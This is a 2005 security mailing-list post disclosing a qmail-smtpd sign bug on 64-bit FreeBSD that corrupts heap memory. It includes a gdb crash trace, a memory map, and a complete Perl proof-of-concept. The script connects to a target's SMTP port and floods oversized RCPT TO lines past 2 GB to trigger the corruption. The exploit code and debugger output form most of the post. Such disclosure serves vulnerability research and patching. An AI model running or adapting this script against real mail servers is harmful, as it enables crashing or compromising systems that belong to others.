| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon May 9 14:17:29 2005
From: guninski at guninski.com (Georgi Guninski)
Subject: 64 bit qmail fun
On Fri, May 06, 2005 at 04:01:07PM +0300, Georgi Guninski wrote:
> http://www.guninski.com/where_do_you_want_billg_to_go_today_4.html
>
> 3. sign problem in qmail_put/substdio_put
on
FreeBSD amdkotef64.localdomain 5.3-BETA6 FreeBSD 5.3-BETA6 #0: Sat Sep 25
21:49:38 UTC 2004 root@...boy.samsco.home:/usr/obj/usr/src/sys/GENERIC
amd64
the static/heap layout is "better" than linux, so
bytecopy(negative) passes and a lot of memory is corrupted:
0x400000 0x408000 8 0 0xffffff0047c857e0 r-x 1 0 0x2180 COW NNC vnode
/var/qmail/bin/qmail-smtpd
0x507000 0x508000 1 0 0xffffff00471e0380 rw- 1 0 0x2180 COW NNC vnode
/var/qmail/bin/qmail-smtpd
0x508000 0x50b000 3 0 0xffffff005b5d6c40 rw- 2 0 0x2180 NCOW NNC swap -
0x50b000 0x1778df000 338914 0 0xffffff005b5d6c40 rwx 2 0 0x2180 NCOW NNC swap
-
0x200507000 0x200529000 17 0 0xffffff005d2a6700 r-x 59 28 0x4 COW NC vnode
/libexec/ld-elf.so.1
note memory is contiguous.
Program received signal SIGBUS, Bus error.
0x000000020069afb6 in ldexp () from /lib/libc.so.5
(gdb) info stack
#0 0x000000020069afb6 in ldexp () from /lib/libc.so.5
#1 0x000000020069b07c in ldexp () from /lib/libc.so.5
#2 0x000000020069b2eb in ldexp () from /lib/libc.so.5
#3 0x000000020069bc6d in ldexp () from /lib/libc.so.5
#4 0x000000020069bd58 in malloc () from /lib/libc.so.5
#5 0x00000000004058aa in alloc (n=1040) at alloc.c:20
#6 0x000000000040592f in alloc_re (x=0x508e20, m=896, n=1039) at
alloc_re.c:11
#7 0x0000000000405580 in stralloc_readyplus (x=0x508e20, n=897)
at stralloc_eady.c:6
#8 0x00000000004023a8 in commands (ss=0x507640, c=0x507660) at commands.c:20
#9 0x00000000004020e1 in main () at qmail-smtpd.c:419
(gdb) x/i $rip
0x20069afb6 <ldexp+1654>: movq $0x2,(%rax,%rsi,8)
(gdb) p/x $rax
$7 = 0x200837000
(gdb) p/x $rsi
$8 = 0x7676767676268
0x50b360: 0x76767676 0x76767676 0x54007676 0x76767676
probably after substdio is corrupted even more fun is possible.
---------------------------------------------------------------
#!/usr/bin/perl -w
# copyright georgi guninski
# cannot be used in vulnerability databases
use IO::Socket;
my $host=$ARGV[0] || "localhost";
my $port=$ARGV[1] || 25;
my $sock=IO::Socket::INET->new(Proto => 'TCP',PeerAddr => $host,
PeerPort=>$port) || die("socket");
my $payload="v" x (1024*1024);
my $lo2 = "v" x (1024*1024);
my $i=0;
my $t;
print $sock "HELO a\r\n";
print $sock "MAIL FROM: a\r\n";
my $leg = 842;
$payload = "v" x $leg;
$cou=0;
my $vp= "v" x (1024*1024);
my $wri = 0;
while (42)
{
print $sock "RCPT TO: ${payload}\r\n";
$t=<$sock>;
$cou++;
$wri += ($leg + 2);
if ($wri > 0x80000010) {last;}
if ($cou % (1024) == 0) {print " .. " . $wri/(1024*1024) . "\n";}
}
print $sock "DATA\r\n";
print $sock "where do you want bill gates to go today?\r\n";
print $sock ".\r\n";
while (42)
{
print $sock "${lo2}";
}
while(<$sock>)
{
print $_;
}
---------------------------------------------------------------
--
where do you want bill gates to go today?
Powered by blists - more mailing lists